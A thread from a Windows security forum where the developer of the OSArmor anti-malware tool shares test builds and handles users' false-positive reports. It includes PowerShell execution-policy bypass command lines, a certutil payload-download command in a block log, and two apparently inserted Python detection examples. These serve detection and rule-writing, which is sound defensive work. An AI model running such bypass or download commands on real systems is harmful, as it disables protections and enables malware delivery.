NoVirusThanks OSArmor: An Additional Layer of Defense

Discussion in 'other anti-malware software' started by novirusthanks, Dec 17, 2017.

  1. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,359
    Location:
    Italy
    @bjm_

    Thanks for sharing.

    @siketa

    Yes, still a few small things to check and it should be ready.

    @Sampei Nihira

    Should be fine.

    @plat1098

    Unfortunately the exes are not signed.

    However, try this exclusion rule (safer because it also checks the command line):

    Code:
    [%PROCESS%: C:\Users\Public\Documents\Winstep\Versions\setup.exe] [%PARENTPROCESS%: C:\Users\*\AppData\Local\Temp\is-?????.tmp\setup.tmp] [%PROCESSCMDLINE%: "C:\Users\Public\Documents\Winstep\Versions\setup.exe" /SPAWNWND=* /NOTIFYWND=* /SP /SILENT]
    
    Or just:

    Code:
    [%PROCESS%: C:\Users\Public\Documents\Winstep\Versions\setup.exe] [%PARENTPROCESS%: C:\Users\*\AppData\Local\Temp\is-?????.tmp\setup.tmp]
    
     
  2. plat1098

    plat1098 Guest

    Thank you for the helpful replies, @mood, @novirusthanks! I'll add the first exclusion rule from novirusthanks in post 1426 and see how it goes. :)
     
  3. chrcol

    chrcol Registered Member

    Joined:
    Apr 19, 2006
    Posts:
    982
    Location:
    UK
    This looks very promising. Now I hope there is no noticeable lag when installed; I will install it on my test system and test away. :)

    A request, if it's not already implemented: can these known PowerShell script restriction bypasses be blocked by OSArmor?

    Code:
    1. Run the script in PowerShell_ISE by selecting all of the code and pressing F8
    2. PowerShell.exe -ExecutionPolicy Bypass -File c:\temp\PowerShellScript.ps1
    3. PowerShell.exe -ExecutionPolicy UNRestricted -File c:\temp\PowerShellScript.ps1
    4. Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
    Also does anyone run this alongside HMPA with no issues?
     
  4. stapp

    stapp Global Moderator

    Joined:
    Jan 12, 2006
    Posts:
    24,107
    Location:
    UK
    Installed on Win 10 now and so far I hardly even notice it's there.
     
  5. shadek

    shadek Registered Member

    Joined:
    Feb 26, 2008
    Posts:
    2,538
    Location:
    Sweden
    With the latest build I am getting an error when accessing the "main protection" and "advanced" tabs in settings. It's always the same address and same module, but a different "Read of address" every time.

    [three screenshots of the error attached]
     
    Last edited: Apr 2, 2018
  6. loungehake

    loungehake Registered Member

    Joined:
    Mar 9, 2015
    Posts:
    201
    Location:
    Wigan
    I wish that OSArmor did not cause both my Windows 7 (64bit) systems to hang. Since the first test version of 1.4 this situation has prevailed. By comparison, my Windows XP systems have been entirely free of such problems right through to test version 46. There must be some underlying bug which awaits discovery.
     
  7. guest

    guest Guest

    @shadek, do you use an anti-exploit (or used the one in Win10 with some personal settings) or some other security Apps?

    If yes, what if you disable all of them, still have the error?
     
  8. shadek

    shadek Registered Member

    Joined:
    Feb 26, 2008
    Posts:
    2,538
    Location:
    Sweden
    I only use Windows Defender and OSA. I tried disabling all of Windows 10's native anti-exploit mechanisms but that didn't help. I'll try to re-install.

    Edit: Re-installing did not work.
     
    Last edited: Apr 2, 2018
  9. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,359
    Location:
    Italy
    Here is a new v1.4 (pre-release) test47:
    http://downloads.novirusthanks.org/files/osarmor_setup_1.4_test47.exe

    *** Please do not share the download link, we will delete it when we release the official v1.4 ***

    So far this is what's new compared to the previous pre-release:

    To install it, first uninstall the previous build, then reboot (not really needed but may help), and install the new build.

    Here is a screenshot:

    [screenshot: osa47.png]

    Question:

    Are you guys having alerts\FPs with the option "Block suspicious processes" (build 47)?

    Please let me know in case.

    @chrcol

    You can create custom rules to block anything you want.

    OSA can block 2 and 3 with pre-configured rules. For 4 I can add a rule in the next build, or you can add this to CustomBlock.db:

    Code:
    [%PROCESS%: *\powershell.exe] [%PROCESSCMDLINE%: *-ExecutionPolicy *UnRestricted*]
    
    Have not tested 1 yet.

    Should work fine, I recall there are a few users that use both OSA and HMPA together.

    @shadek

    Really strange, I have OSA running on 5 machines here (not VMs) and Configurator works fine.

    I suspect, as @guest said, that there is a conflict with a WDEG rule probably.

    Can you try this new build 47?

    @loungehake

    No hangs here (W7 Pro and W10 Pro), will try to reproduce.
     
    Last edited: Apr 2, 2018
  10. bjm_

    bjm_ Registered Member

    Joined:
    May 22, 2009
    Posts:
    4,458
    Location:
    .
    Date/Time: 4/3/2018 4:06:49 PM
    Process: [10272]C:\Windows\System32\makecab.exe
    Parent: [10612]C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.15063.994_none_9e3edae32dc31172\TiWorker.exe
    Rule: BlockMakecabExecution
    Rule Name: Block execution of makecab.exe
    Command Line: "C:\WINDOWS\system32\makecab.exe" C:\WINDOWS\Logs\CBS\CbsPersist_20180328174047.log C:\WINDOWS\Logs\CBS\CbsPersist_20180328174047.cab
    Signer:
    Parent Signer:
    User/Domain: SYSTEM/NT AUTHORITY
    Integrity Level: System
    [screenshot: 2614.png]
    (test47 all rules checked)
     
  11. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,359
    Location:
    Italy
    Here is a new v1.4 (pre-release) test48:
    http://downloads.novirusthanks.org/files/osarmor_setup_1.4_test48.exe

    *** Please do not share the download link, we will delete it when we release the official v1.4 ***

    So far this is what's new compared to the previous pre-release:

    + Fixed a typo on Exclusions.db and CustomBlock.db
    + New option: Block "ExecutionPolicy Unrestricted" on command-line (PowerShell)
    + Improved Prevent regsvr32.exe from loading .sct files
    + Improved Prevent rundll32.exe from using Control_RunDLL (shell32.dll)
    + Improved Block loading of .inf files via advpack.dll,LaunchINFSection
    + Improved Block "ExecutionPolicy Bypass" on command-line (PowerShell)
    + Improved Block suspicious command-lines
    + Improved Block suspicious Svchost.exe process behaviors
    + Minor fixes and optimizations
    + Fixed some false positives

    To install it, first uninstall the previous build, then reboot (not really needed but may help), and install the new build.

    @bjm_

    FP fixed on build 48.
     
  12. digmor crusher

    digmor crusher Registered Member

    Joined:
    Jul 6, 2012
    Posts:
    1,172
    Location:
    Canada
    Test 48 running well here alongside EAM. New builds are coming so fast that I usually just install every second build. No reboot needed.
     
  13. Trooper

    Trooper Registered Member

    Joined:
    Jan 26, 2005
    Posts:
    5,508
    Just updated to the latest build. Thanks as always!
     
  14. Djigi

    Djigi Registered Member

    Joined:
    Aug 13, 2012
    Posts:
    554
    Location:
    Croatia
    In Win 10 v1803 everything looks good (and SysHardener also).

    [screenshot: Clipboard01.jpg]

    Can you add (on the Advanced tab) options to select all / Suggested Tweaks (see picture)?

    [screenshot: Clipboard04.jpg]
     
  15. loungehake

    loungehake Registered Member

    Joined:
    Mar 9, 2015
    Posts:
    201
    Location:
    Wigan
    Do you have any tools or instructions for users to use to provide the developer with system information to help identify problems?
     
  16. guest

    guest Guest

    +1
     
  17. EASTER

    EASTER Registered Member

    Joined:
    Jul 28, 2007
    Posts:
    11,126
    Location:
    U.S.A. (South)
    On Windows 10 1803 this release is working to expectations. Still exploring and testing fields.
     
  18. Krusty

    Krusty Registered Member

    Joined:
    Feb 3, 2012
    Posts:
    10,241
    Location:
    Among the gum trees
    Hi @novirusthanks ,

    I just got this probable false positive when opening Chrome.
    Code:
    Date/Time: 5/04/2018 8:52:43 AM
    Process: [10132]C:\Windows\System32\cmd.exe
    Parent: [2848]C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    Rule: BlockSuspiciousCmdlines
    Rule Name: Block execution of suspicious command-line strings
    Command Line: C:\WINDOWS\system32\cmd.exe /d /c "C:\Program Files\Norton Security\Engine\22.12.1.15\coNatHst.exe" chrome-extension://cjabmdjcfcfdmffimndhafhblfmpjdpe/ --parent-window=0 < \\.\pipe\chrome.nativeMessaging.in.250e2ef050df31bb > \\.\pipe\chrome.nativeMessaging.out.250e2ef050df31bb
    Signer:
    Parent Signer: Google Inc
    User/Domain: David/DAVID-HP
    Integrity Level: Medium
     
    Thanks.

    Edit: I have added it as an exclusion twice already but it gets blocked every time I open Chrome. I am sure it is related to the Norton Security Toolbar extension.

    Edit 2: This exclusion worked.

    Note the two "*" wildcards required.
     
    Last edited: Apr 4, 2018
  19. guest

    guest Guest

    ("C:\Program Files\Norton Security\Engine\22.12.1.15\coNatHst.exe")
    The version number might change sooner or later. To mitigate this it can be exchanged with a "*" too.
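The exclusion rules from post 1 and the wildcard advice just above, worked through as an added example. This is not OSArmor's code: its matcher is not published, so the semantics below are assumptions (`*` matches any run of characters, `?` exactly one, matching is case-insensitive, and every `[%FIELD%: pattern]` term of a rule must match). The events are constructed, including the Explorer launch, the Winstep window handles, the second Norton engine version and the pipe ids. It shows why a bare `%PROCESS%` match on a path under the user-writable Public\Documents folder excludes more than the parent-plus-command-line form, and why the engine version directory and the per-launch pipe ids in the Chrome native-messaging command line need wildcards for the exclusion to keep matching.

```python
"""Evaluate OSArmor-style exclusion rules against process events (added
example, not OSArmor's code). Assumed semantics: '*' matches any run of
characters, '?' exactly one, matching is case-insensitive, and every
[%FIELD%: pattern] term of a rule must match for the rule to apply.
"""
import re

FIELDS = {"PROCESS": "process", "PARENTPROCESS": "parent",
          "PROCESSCMDLINE": "cmdline"}           # rule field -> event key
TERM_RE = re.compile(r"\[%(\w+)%:\s*(.*?)\](?=\s*\[%|\s*$)")


def glob_to_regex(pattern: str) -> re.Pattern:
    """Translate the assumed glob syntax into a case-insensitive regex."""
    parts = [".*" if ch == "*" else "." if ch == "?" else re.escape(ch)
             for ch in pattern]
    return re.compile("".join(parts), re.IGNORECASE | re.DOTALL)


def parse_rule(rule: str) -> dict:
    """Return {event_key: regex} for every [%FIELD%: pattern] term in a rule."""
    terms = TERM_RE.findall(rule)
    if not terms:
        raise ValueError(f"no [%FIELD%: pattern] terms in {rule!r}")
    compiled = {}
    for field, pattern in terms:
        if field not in FIELDS:
            raise ValueError(f"unsupported field %{field}%")
        compiled[FIELDS[field]] = glob_to_regex(pattern.strip())
    return compiled


def rule_matches(rule: str, event: dict) -> bool:
    """A rule applies only when all of its terms match the event."""
    return all(rx.fullmatch(event.get(key, "")) is not None
               for key, rx in parse_rule(rule).items())


def matching_rules(event: dict, rules: dict) -> list:
    """Names of the rules that would exclude this event, sorted."""
    return sorted(name for name, text in rules.items() if rule_matches(text, event))


WINSTEP = r"C:\Users\Public\Documents\Winstep\Versions\setup.exe"
INNO_TMP = r"C:\Users\*\AppData\Local\Temp\is-?????.tmp\setup.tmp"

RULES = {
    # Path only: excludes anything that runs from this user-writable path.
    "path_only": f"[%PROCESS%: {WINSTEP}]",
    # The two rules from post 1: parent constrained, then parent plus command line.
    "parent": f"[%PROCESS%: {WINSTEP}] [%PARENTPROCESS%: {INNO_TMP}]",
    "parent_and_cmdline": (
        f"[%PROCESS%: {WINSTEP}] [%PARENTPROCESS%: {INNO_TMP}] "
        f'[%PROCESSCMDLINE%: "{WINSTEP}" /SPAWNWND=* /NOTIFYWND=* /SP /SILENT]'),
    # Constructed exclusion for the Chrome native-messaging FP: the engine
    # version directory and the per-launch pipe ids are wildcarded.
    "chrome_norton_host": (
        r"[%PROCESS%: *\cmd.exe] "
        r"[%PARENTPROCESS%: *\Google\Chrome\Application\chrome.exe] "
        r'[%PROCESSCMDLINE%: *\cmd.exe /d /c "C:\Program Files\Norton Security\Engine\*\coNatHst.exe" '
        r"chrome-extension://cjabmdjcfcfdmffimndhafhblfmpjdpe/ --parent-window=* "
        r"< \\.\pipe\chrome.nativeMessaging.in.* > \\.\pipe\chrome.nativeMessaging.out.*]"),
}


def chrome_host_event(version: str, pipe_id: str) -> dict:
    """Constructed event shaped like the Chrome native-messaging FP logs above."""
    cmd = (r"C:\WINDOWS\system32\cmd.exe /d /c "
           rf'"C:\Program Files\Norton Security\Engine\{version}\coNatHst.exe" '
           r"chrome-extension://cjabmdjcfcfdmffimndhafhblfmpjdpe/ --parent-window=0 "
           rf"< \\.\pipe\chrome.nativeMessaging.in.{pipe_id} > \\.\pipe\chrome.nativeMessaging.out.{pipe_id}")
    return {"process": r"C:\Windows\System32\cmd.exe",
            "parent": r"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe",
            "cmdline": cmd}


EVENTS = {  # all constructed
    # Legitimate update: Inno Setup's temp-dir stub launches the real installer.
    "winstep_update": {
        "process": WINSTEP,
        "parent": r"C:\Users\Alice\AppData\Local\Temp\is-K2F7Q.tmp\setup.tmp",
        "cmdline": f'"{WINSTEP}" /SPAWNWND=$50A62 /NOTIFYWND=$40D08 /SP /SILENT'},
    # Same path, launched from Explorer: what a file dropped into the
    # world-writable Public\Documents folder would look like.
    "dropped_binary": {
        "process": WINSTEP, "parent": r"C:\Windows\explorer.exe",
        "cmdline": f'"{WINSTEP}"'},
    "norton_host_22_12": chrome_host_event("22.12.1.15", "250e2ef050df31bb"),
    "norton_host_22_14": chrome_host_event("22.14.0.54", "9a1c0ffee0b3d2e7"),
    # Chrome spawning cmd.exe for something else must not be excluded.
    "chrome_runs_other": {
        "process": r"C:\Windows\System32\cmd.exe",
        "parent": r"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe",
        "cmdline": r'C:\WINDOWS\system32\cmd.exe /d /c "C:\Users\Public\update.exe"'},
}

if __name__ == "__main__":
    for name, event in EVENTS.items():
        print(f"{name:20s} excluded by: {matching_rules(event, RULES) or 'nothing'}")
```

Running it, the dropped binary is excluded only by the path-only rule, the real Winstep update by all three Winstep rules, and both Norton engine versions by the single wildcarded Chrome rule, while cmd.exe started by Chrome for anything else stays unexcluded. Whatever the real matcher does with `?` and with case, the structural point holds: each extra field in an exclusion is one more property an attacker has to reproduce to ride on it.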
     
  20. Krusty

    Krusty Registered Member

    Joined:
    Feb 3, 2012
    Posts:
    10,241
    Location:
    Among the gum trees
    Great catch! Thanks as always, mood. :thumb:
     
  21. guest

    guest Guest

  22. Azure Phoenix

    Azure Phoenix Registered Member

    Joined:
    Nov 22, 2014
    Posts:
    1,560
    I got an FP similar to Krusty's, but mine involved EagleGet.

    Date/Time: 4/4/2018 8:41:48 PM
    Process: [5184]C:\Windows\System32\cmd.exe
    Parent: [9500]C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    Rule: BlockSuspiciousCmdlines
    Rule Name: Block execution of suspicious command-line strings
    Command Line: C:\WINDOWS\system32\cmd.exe /d /c "C:\Program Files (x86)\EagleGet\EGMonitor.exe" chrome-extension://kaebhgioafceeldhgjmendlfhbfjefmo/ --parent-window=0 < \\.\pipe\chrome.nativeMessaging.in.b20bf05ca9fc03d3 > \\.\pipe\chrome.nativeMessaging.out.b20bf05ca9fc03d3
    Signer:
    Parent Signer: Google Inc
    Integrity Level: Medium
     
  23. Sampei Nihira

    Sampei Nihira Registered Member

    Joined:
    Apr 7, 2013
    Posts:
    3,367
    Location:
    Italy
    Better to enter a rule for certutil.exe:

    https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/

    https://isc.sans.edu/diary/rss/23517
     
    Last edited: Apr 5, 2018
  24. jimb949

    jimb949 Registered Member

    Joined:
    Jul 6, 2017
    Posts:
    129
    Location:
    LA
    FP:
    Date/Time: 4/5/2018 9:04:36 AM
    Process: [4664]C:\Windows\System32\cmd.exe
    Parent: [1508]C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    Rule: BlockSuspiciousCmdlines
    Rule Name: Block execution of suspicious command-line strings
    Command Line: C:\windows\system32\cmd.exe /d /c "C:\Program Files (x86)\Siber Systems\AI RoboForm\Chrome\rf-chrome-nm-host.exe" chrome-extension://pnlccmojcmeohlpggmfnbbiapkmbliob/ --parent-window=0 < \\.\pipe\chrome.nativeMessaging.in.7570cb3ded711f33 > \\.\pipe\chrome.nativeMessaging.out.7570cb3ded711f33
    Signer:
    Parent Signer: Google Inc
    User/Domain: Jim/Jim-PC
    Integrity Level: Medium

    I'm using test 48 and have excluded this FP, but every time I open Chrome I still get a popup for it.
     
  25. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,359
    Location:
    Italy
    Here is a new v1.4 (pre-release) test49:
    http://downloads.novirusthanks.org/files/osarmor_setup_1.4_test49.exe

    Edit: Link fixed

    *** Please do not share the download link, we will delete it when we release the official v1.4 ***

    So far this is what's new compared to the previous pre-release:

    + Improved Block execution of .wsf scripts
    + Improved Block suspicious command-lines
    + Disabled /silent and /verysilent uninstallation
    + Improved Prevent important Windows services from being disabled
    + Fixed some false positives

    To install it, first uninstall the previous build, then reboot (not really needed but may help), and install the new build.

    All reported FPs should be fixed.

    @Sampei Nihira

    Rule was added a few builds ago:

    Code:
    Date/Time: 06/04/2018 00:50:53
    Process: [6084]C:\Windows\System32\certutil.exe
    Parent: [6020]C:\Windows\System32\cmd.exe
    Rule: BlockSuspiciousCmdlines
    Rule Name: Block execution of suspicious command-line strings
    Command Line: certutil  -urlcache -split -f http://127.0.0.1:80/payload.exe
    Signer:
    Parent Signer:
    
    :thumb:
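The custom PowerShell rule from post 9 (`*-ExecutionPolicy *UnRestricted*`) and the certutil command line logged just above, as an added detection example. This is not OSArmor's code and says nothing about what the "Block ExecutionPolicy Unrestricted" option added in build 48 actually matches. powershell.exe's own command-line parser accepts any unambiguous prefix of a switch name (-ex, -exe, -exec, ...), the -ep alias, and either '-' or '/' as the switch prefix, all case-insensitively, so a glob that spells out -ExecutionPolicy misses those spellings; whether OSArmor's glob matching is case-insensitive is not stated in the thread and is assumed here (modelled with fnmatchcase on lowercased text). The certutil check covers the -urlcache -split -f form in the log plus the -verifyctl -f and -decode variants, which are not mentioned on this page. All command lines are constructed except the two from post 3 and the one from the log above.

```python
"""Suspicious command-line checks for two patterns from this thread (added
example, not OSArmor's code).

Assumptions: OSArmor's glob is modelled as case-insensitive with fnmatchcase
on lowercased text; powershell.exe switch handling (unambiguous prefixes,
the -ep alias, '-' or '/') follows powershell.exe's own parser; certutil
accepts '-' or '/' for its options in any order.
"""
import fnmatch
import re


def prefix_alternation(word: str, minimum: int) -> str:
    """Regex alternation of every prefix of `word` at least `minimum` chars
    long, longest first so the fullest spelling is preferred."""
    return "|".join(re.escape(word[:n]) for n in range(len(word), minimum - 1, -1))


# '-ExecutionPolicy', any prefix down to '-ex', or the '-ep' alias, with '-' or
# '/', preceded by whitespace or start of string (so 'Get-ExecutionPolicy' does
# not count), followed by one of the two values that disable script checks.
EXEC_POLICY_RE = re.compile(
    r"(?<![^\s])[-/](?:" + prefix_alternation("executionpolicy", 2) + r"|ep)"
    r"\s+(bypass|unrestricted)(?![^\s])",
    re.IGNORECASE,
)

# The literal pattern from the custom rule in post 9, kept for comparison.
LITERAL_GLOB = "*-ExecutionPolicy *UnRestricted*"


def literal_glob_hits(cmdline: str) -> bool:
    """Would the literal glob match? (assumed case-insensitive matching)"""
    return fnmatch.fnmatchcase(cmdline.lower(), LITERAL_GLOB.lower())


def classify(process: str, cmdline: str) -> list:
    """Findings for one process start; an empty list means nothing suspicious."""
    image = process.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    findings = []
    if image in ("powershell.exe", "pwsh.exe"):
        m = EXEC_POLICY_RE.search(cmdline)
        if m:
            findings.append("powershell_executionpolicy_" + m.group(1).lower())
    if image == "certutil.exe":
        tokens = cmdline.split()
        flags = {t[1:].lower() for t in tokens[1:] if len(t) > 1 and t[0] in "-/"}
        has_url = any(t.lower().startswith(("http://", "https://", "ftp://"))
                      for t in tokens)
        # Download to disk: -urlcache or -verifyctl, forced (-f), with a URL.
        if flags & {"urlcache", "verifyctl"} and "f" in flags and has_url:
            findings.append("certutil_download")
        # Base64 decode of a staged blob into a file.
        if "decode" in flags:
            findings.append("certutil_decode")
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CU = r"C:\Windows\System32\certutil.exe"

SAMPLES = {  # (process image, command line); constructed unless noted
    # items 2 and 3 from post 3
    "ps_bypass_file": (PS, r"PowerShell.exe -ExecutionPolicy Bypass -File c:\temp\PowerShellScript.ps1"),
    "ps_unrestricted_file": (PS, r"PowerShell.exe -ExecutionPolicy UNRestricted -File c:\temp\PowerShellScript.ps1"),
    "ps_ep_alias": (PS, r"powershell -ep unrestricted -w hidden -f c:\temp\x.ps1"),
    "ps_slash_prefix": (PS, r"powershell /exec bypass -nop -c iex (gc c:\temp\x.txt)"),
    "ps_query_policy": (PS, r"powershell -NoProfile -Command Get-ExecutionPolicy -List"),
    # the command line from the OSArmor log in post 25
    "certutil_urlcache": (CU, r"certutil  -urlcache -split -f http://127.0.0.1:80/payload.exe"),
    "certutil_verifyctl": (CU, r"certutil.exe -verifyctl -f -split https://127.0.0.1/payload.txt"),
    "certutil_decode": (CU, r"certutil -decode c:\temp\blob.txt c:\temp\payload.exe"),
    "certutil_hashfile": (CU, r"certutil -hashfile C:\Windows\System32\notepad.exe SHA256"),
}


def report() -> dict:
    """label -> (findings, whether the literal post-9 glob would have fired)."""
    return {label: (classify(proc, cmd), literal_glob_hits(cmd))
            for label, (proc, cmd) in SAMPLES.items()}


if __name__ == "__main__":
    for label, (findings, glob_hit) in report().items():
        print(f"{label:22s} findings={findings or '-'}  literal_glob={glob_hit}")
```

Of the five PowerShell samples, the literal glob fires only on the full `-ExecutionPolicy UNRestricted` spelling; the `-ep`, `/exec` and `Bypass` variants go past it, while the prefix-aware regex catches all four overrides and stays quiet on `Get-ExecutionPolicy -List`. Item 1 from post 3 (running a selection in the ISE with F8) starts no new process and leaves no command line at all, so no command-line rule, literal or not, can see it; it would need a rule on the ISE process itself.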
     